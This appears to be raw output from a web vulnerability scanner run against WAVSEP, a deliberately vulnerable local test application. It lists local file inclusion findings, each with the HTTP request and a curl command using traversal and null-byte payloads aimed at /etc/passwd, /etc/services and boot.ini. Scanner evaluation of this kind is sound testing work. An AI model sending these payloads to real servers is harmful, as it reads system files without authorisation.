curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
